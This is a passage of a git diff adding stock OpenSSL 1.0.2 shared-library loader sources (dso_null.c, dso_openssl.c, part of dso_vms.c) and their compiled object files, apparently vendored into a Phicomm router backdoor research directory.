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
BCYk^M

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_null.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_null.c
new file mode 100644
index 0000000..20122d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_null.c
@@ -0,0 +1,92 @@
+/* dso_null.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * This "NULL" method is provided as the fallback for systems that have no
+ * appropriate support for "shared-libraries".
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+static DSO_METHOD dso_meth_null = {
+    "NULL shared library method",
+    NULL,                       /* load */
+    NULL,                       /* unload */
+    NULL,                       /* bind_var */
+    NULL,                       /* bind_func */
+/* For now, "unbind" doesn't exist */
+#if 0
+    NULL,                       /* unbind_var */
+    NULL,                       /* unbind_func */
+#endif
+    NULL,                       /* ctrl */
+    NULL,                       /* dso_name_converter */
+    NULL,                       /* dso_merger */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    NULL,                       /* pathbyaddr */
+    NULL                        /* globallookup */
+};
+
+DSO_METHOD *DSO_METHOD_null(void)
+{
+    return (&dso_meth_null);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_null.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_null.o
new file mode 100644
index 0000000000000000000000000000000000000000..3f575d9fb63494dcfbaa21f4ab416ff56f02debc
GIT binary patch
literal 1952
zcmc&!OK;Oa5FXcs7Fwu598impPl!jmiVG5t1B%p!_7GYL$d$xN3_<u&*^bn3;Bnzr
zsYj0d6eKSEjQ$101tFv|<DK0sD~m%fjAYL@pXZy|o!#VJtNm!kaX^^^4`CW97T~ix
z#mx#f!Gk6Ev2^v<_Q5G)zV39|ZNC_Wc{KFnSN%N9Cw>x@qik3S{?BV`W8;B;z0)73
z<=DS3Zi~iRaCcmV!Q1tQXxzCWX}P>vbRIsmqph6|%m92LPHq1ZVlwB=6L9uDXJv72
z{tyR7{FUkpz#{v9Ihye-d_S(sacfV2)}U7Lx5~vzw$U0KIIZcPMpUOdFN2ZLHS*1m
zE}St#ja@jau?bvQFhh-9nAcc=Wds+E{p#5bi>#ZD<5&!UAl;)XhRvtD-N&tG+q;`G
zmX+qXAf6Wx{(UTs>8itY8UQ|jpnQ6?iDHtJVIM?M=F*Q8%A+_GWwc*{7=~pCqF)ps
z@{9sX4@7_=B~=U}5od!i1~JHzBuY`2W@RMsUab{nIC#zR%XBRE@@y~4%Lx~VM%@>A
zm_&M6Cj~wV>8_c3r&>*Vq3L<c&^QT6te~UY)s&%rf8(KDX677v>Z49r@z<EQZ*H4)
zwxb%RtztkmPpS`4OEuT=F-`TS{h6lvE8oJ8gzf(CS=3{%oUZ`;Ci=Sh9o5W_&d8o$
z2RZ8Bz{j*B4sMwwVzqANpBtQ+x}XwFvL-i0j($(PT%GN)-q(x-YW<4-h=5XUeS`J(
zzHI#m)Yi@KXU+WRUq|WH{j2MZY0%^T_t>9Dj(!Wap8omlvquU(asQhX7{=u^a{*DE
N-edAmXG&n}{{UAGcy<5)

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_openssl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_openssl.c
new file mode 100644
index 0000000..087e989
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_openssl.c
@@ -0,0 +1,83 @@
+/* dso_openssl.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+/* We just pinch the method from an appropriate "default" method. */
+
+DSO_METHOD *DSO_METHOD_openssl(void)
+{
+#ifdef DEF_DSO_METHOD
+    return (DEF_DSO_METHOD());
+#elif defined(DSO_DLFCN)
+    return (DSO_METHOD_dlfcn());
+#elif defined(DSO_DL)
+    return (DSO_METHOD_dl());
+#elif defined(DSO_WIN32)
+    return (DSO_METHOD_win32());
+#elif defined(DSO_VMS)
+    return (DSO_METHOD_vms());
+#elif defined(DSO_BEOS)
+    return (DSO_METHOD_beos());
+#else
+    return (DSO_METHOD_null());
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_openssl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_openssl.o
new file mode 100644
index 0000000000000000000000000000000000000000..15213b8fe2cb0822b06de1a82332d467f3af7604
GIT binary patch
literal 1552
zcmbtT%}x|S5UycSP%$jTg9(OAJQ$49nFSJ+gIRv|N3*zzEJriUE~6yO&XSp)WbvS{
z;L*qN=+Vc3Bk@K^uxh3YdOHmVtfZ!@zOApSySny!tyLd$9AI(aEnG#60{j`f@~gR9
zg@-T&f2ZfqPV%_1v9and>~ynOX6_rYEWE|at1J&I-<CY#tvoN_JbN6!Wz;*UjSoA3
z<$n=YLM3@r7;wIR1ZP-w=B6elf8fCgf1-Z7r|eCJ?lKOi7q*;|^`>+NKE)`jgq3Vk
zg1a^tt4v&jPhNx5G)83_!&&W|eCMZ#)BH?%jere@y>#FY4#PN2BhiD+?Y6&F>onV&
z41(Wiwb$2Le!E`Zu66v*+Ip+z>xpp|MfrPCPnyI7)boo%T=Yq3O|(@35b05023@o=
zDeOLbNf-q}hC>NrFOUI<ZkmGV4f_2sMl2r4P~dJXrZVUqsQ62qiNgdhlE@<vd4+J_
z|C|K<Fz^4r9~TSI&X_M+MT~^!UqnSN`()=(X*N|<T|70E#|pfUmiq7}F#b&8<_5k~
zJkwAOU0z~9HE+wWAeU--sJd|f7dnVO_h-ARVS1|61I=e1L+{a{f6d4aVLVg`uCi=+
zejInvp_(TDr%EvIW%55^p6&gbmiHqr^ZEU3y{YwY`k=V#!t~#vT{8KEnQw;>94lUv
X0!<WriOis9<L|2TN0*s}WAgt2;D2U;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_vms.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_vms.c
new file mode 100644
index 0000000..14d885d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_vms.c
@@ -0,0 +1,532 @@
+/* dso_vms.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+#ifndef OPENSSL_SYS_VMS
+DSO_METHOD *DSO_METHOD_vms(void)
+{
+    return NULL;
+}
+#else
+
+# pragma message disable DOLLARID
+# include <rms.h>
+# include <lib$routines.h>
+# include <stsdef.h>
+# include <descrip.h>
+# include <starlet.h>
+# include "vms_rms.h"
+
+/* Some compiler options may mask the declaration of "_malloc32". */
+# if __INITIAL_POINTER_SIZE && defined _ANSI_C_SOURCE
+#  if __INITIAL_POINTER_SIZE == 64
+#   pragma pointer_size save
+#   pragma pointer_size 32
+void *_malloc32(__size_t);
+#   pragma pointer_size restore
+#  endif                        /* __INITIAL_POINTER_SIZE == 64 */
+# endif                         /* __INITIAL_POINTER_SIZE && defined
+                                 * _ANSI_C_SOURCE */
+
+# pragma message disable DOLLARID
+
+static int vms_load(DSO *dso);
+static int vms_unload(DSO *dso);
+static void *vms_bind_var(DSO *dso, const char *symname);
+static DSO_FUNC_TYPE vms_bind_func(DSO *dso, const char *symname);
+# if 0
+static int vms_unbind_var(DSO *dso, char *symname, void *symptr);
+static int vms_unbind_func(DSO *dso, char *symname, DSO_FUNC_TYPE symptr);
+static int vms_init(DSO *dso);
+static int vms_finish(DSO *dso);
+static long vms_ctrl(DSO *dso, int cmd, long larg, void *parg);
+# endif
+static char *vms_name_converter(DSO *dso, const char *filename);
+static char *vms_merger(DSO *dso, const char *filespec1,
+                        const char *filespec2);
+
+static DSO_METHOD dso_meth_vms = {
+    "OpenSSL 'VMS' shared library method",
+    vms_load,
+    NULL,                       /* unload */
+    vms_bind_var,
+    vms_bind_func,
+/* For now, "unbind" doesn't exist */
+# if 0
+    NULL,                       /* unbind_var */
+    NULL,                       /* unbind_func */
+# endif
+    NULL,                       /* ctrl */
+    vms_name_converter,
+    vms_merger,
+    NULL,                       /* init */
+    NULL                        /* finish */
+};
+
+/*
+ * On VMS, the only "handle" is the file name.  LIB$FIND_IMAGE_SYMBOL depends
+ * on the reference to the file name being the same for all calls regarding
+ * one shared image, so we'll just store it in an instance of the following
+ * structure and put a pointer to that instance in the meth_data stack.
+ */
+typedef struct dso_internal_st {
+    /*
+     * This should contain the name only, no directory, no extension, nothing
+     * but a name.
+     */
+    struct dsc$descriptor_s filename_dsc;
+    char filename[NAMX_MAXRSS + 1];
+    /*
+     * This contains whatever is not in filename, if needed. Normally not
+     * defined.
+     */
+    struct dsc$descriptor_s imagename_dsc;
+    char imagename[NAMX_MAXRSS + 1];
+} DSO_VMS_INTERNAL;
+
+DSO_METHOD *DSO_METHOD_vms(void)
+{
+    return (&dso_meth_vms);
+}
+
+static int vms_load(DSO *dso)
+{
+    void *ptr = NULL;
+    /* See applicable comments in dso_dl.c */
+    char *filename = DSO_convert_filename(dso, NULL);
+
+/* Ensure 32-bit pointer for "p", and appropriate malloc() function. */
+# if __INITIAL_POINTER_SIZE == 64
+#  define DSO_MALLOC _malloc32
+#  pragma pointer_size save
+#  pragma pointer_size 32
+# else                          /* __INITIAL_POINTER_SIZE == 64 */
+#  define DSO_MALLOC OPENSSL_malloc
+# endif                         /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+    DSO_VMS_INTERNAL *p = NULL;
+
+# if __INITIAL_POINTER_SIZE == 64
+#  pragma pointer_size restore
+# endif                         /* __INITIAL_POINTER_SIZE == 64 */
+
+    const char *sp1, *sp2;      /* Search result */
+
+    if (filename == NULL) {
+        DSOerr(DSO_F_VMS_LOAD, DSO_R_NO_FILENAME);
+        goto err;
+    }
+
+    /*-
+     * A file specification may look like this:
+     *
+     *      node::dev:[dir-spec]name.type;ver
+     *
+     * or (for compatibility with TOPS-20):
+     *
+     *      node::dev:<dir-spec>name.type;ver
+     *
+     * and the dir-spec uses '.' as separator.  Also, a dir-spec
+     * may consist of several parts, with mixed use of [] and <>:
+     *
+     *      [dir1.]<dir2>
+     *
+     * We need to split the file specification into the name and
+     * the rest (both before and after the name itself).
+     */
+    /*
+     * Start with trying to find the end of a dir-spec, and save the position
+     * of the byte after in sp1
+     */
+    sp1 = strrchr(filename, ']');
+    sp2 = strrchr(filename, '>');
+    if (sp1 == NULL)
+        sp1 = sp2;
+    if (sp2 != NULL && sp2 > sp1)
+        sp1 = sp2;
+    if (sp1 == NULL)
+        sp1 = strrchr(filename, ':');
+    if (sp1 == NULL)
+        sp1 = filename;
+    else
+        sp1++;                  /* The byte after the found character */
+    /* Now, let's see if there's a type, and save the position in sp2 */
+    sp2 = strchr(sp1, '.');
+    /*
+     * If we found it, that's where we'll cut.  Otherwise, look for a version
+     * number and save the position in sp2
+     */
+    if (sp2 == NULL)
+        sp2 = strchr(sp1, ';');
+    /*
+     * If there was still nothing to find, set sp2 to point at the end of the
+     * string
+     */
+    if (sp2 == NULL)
+        sp2 = sp1 + strlen(sp1);
+
+    /* Check that we won't get buffer overflows */
+    if (sp2 - sp1 > FILENAME_MAX
+        || (sp1 - filename) + strlen(sp2) > FILENAME_MAX) {
+        DSOerr(DSO_F_VMS_LOAD, DSO_R_FILENAME_TOO_BIG);
+        goto err;
+    }
+
+    p = DSO_MALLOC(sizeof(DSO_VMS_INTERNAL));
+    if (p == NULL) {
+        DSOerr(DSO_F_VMS_LOAD, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    strncpy(p->filename, sp1, sp2 - sp1);
+    p->filename[sp2 - sp1] = '\0';
+
+    strncpy(p->imagename, filename, sp1 - filename);
+    p->imagename[sp1 - filename] = '\0';
+    strcat(p->imagename, sp2);
+
+    p->filename_dsc.dsc$w_length = strlen(p->filename);
+    p->filename_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+    p->filename_dsc.dsc$b_class = DSC$K_CLASS_S;
+    p->filename_dsc.dsc$a_pointer = p->filename;
+    p->imagename_dsc.dsc$w_length = strlen(p->imagename);
+    p->imagename_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+    p->imagename_dsc.dsc$b_class = DSC$K_CLASS_S;
+    p->imagename_dsc.dsc$a_pointer = p->imagename;
+
+    if (!sk_void_push(dso->meth_data, (char *)p)) {
+        DSOerr(DSO_F_VMS_LOAD, DSO_R_STACK_ERROR);
+        goto err;
+    }
+
+    /* Success (for now, we lie.  We actually do not know...) */
+    dso->loaded_filename = filename;
+    return (1);
+ err:
+    /* Cleanup! */
+    if (p != NULL)
+        OPENSSL_free(p);
+    if (filename != NULL)
+        OPENSSL_free(filename);
+    return (0);
+}
+
+/*
+ * Note that this doesn't actually unload the shared image, as there is no
+ * such thing in VMS.  Next time it get loaded again, a new copy will
+ * actually be loaded.
+ */
+static int vms_unload(DSO *dso)
+{
+    DSO_VMS_INTERNAL *p;
+    if (dso == NULL) {
+        DSOerr(DSO_F_VMS_UNLOAD, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (sk_void_num(dso->meth_data) < 1)
+        return (1);
+    p = (DSO_VMS_INTERNAL *)sk_void_pop(dso->meth_data);
+    if (p == NULL) {
+        DSOerr(DSO_F_VMS_UNLOAD, DSO_R_NULL_HANDLE);
+        return (0);
+    }
+    /* Cleanup */
+    OPENSSL_free(p);
+    return (1);
+}
+
+/*
+ * We must do this in a separate function because of the way the exception
+ * handler works (it makes this function return
+ */
+static int do_find_symbol(DSO_VMS_INTERNAL *ptr,
+                          struct dsc$descriptor_s *symname_dsc, void **sym,
+                          unsigned long flags)
+{
+    /*
+     * Make sure that signals are caught and returned instead of aborting the
+     * program.  The exception handler gets unestablished automatically on
+     * return from this function.
+     */
+    lib$establish(lib$sig_to_ret);
+
+    if (ptr->imagename_dsc.dsc$w_length)
+        return lib$find_image_symbol(&ptr->filename_dsc,
+                                     symname_dsc, sym,
+                                     &ptr->imagename_dsc, flags);
+    else
+        return lib$find_image_symbol(&ptr->filename_dsc,
+                                     symname_dsc, sym, 0, flags);
+}
+
+void vms_bind_sym(DSO *dso, const char *symname, void **sym)
+{
+    DSO_VMS_INTERNAL *ptr;
+    int status;
+# if 0
+    int flags = (1 << 4);       /* LIB$M_FIS_MIXEDCASE, but this symbol isn't
+                                 * defined in VMS older than 7.0 or so */
+# else
+    int flags = 0;
+# endif
+    struct dsc$descriptor_s symname_dsc;
+
+/* Arrange 32-bit pointer to (copied) string storage, if needed. */
+# if __INITIAL_POINTER_SIZE == 64
+#  define SYMNAME symname_32p
+#  pragma pointer_size save
+#  pragma pointer_size 32
+    char *symname_32p;
+#  pragma pointer_size restore
+    char symname_32[NAMX_MAXRSS + 1];
+# else                          /* __INITIAL_POINTER_SIZE == 64 */
+#  define SYMNAME ((char *) symname)
+# endif                         /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+    *sym = NULL;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_VMS_BIND_SYM, ERR_R_PASSED_NULL_PARAMETER);
+        return;
+    }
+# if __INITIAL_POINTER_SIZE == 64
+    /* Copy the symbol name to storage with a 32-bit pointer. */
+    symname_32p = symname_32;
+    strcpy(symname_32p, symname);
+# endif                         /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+    symname_dsc.dsc$w_length = strlen(SYMNAME);
+    symname_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+    symname_dsc.dsc$b_class = DSC$K_CLASS_S;
+    symname_dsc.dsc$a_pointer = SYMNAME;
+
+    if (sk_void_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_VMS_BIND_SYM, DSO_R_STACK_ERROR);
+        return;
+    }
+    ptr = (DSO_VMS_INTERNAL *)sk_void_value(dso->meth_data,
+                                            sk_void_num(dso->meth_data) - 1);
+    if (ptr == NULL) {
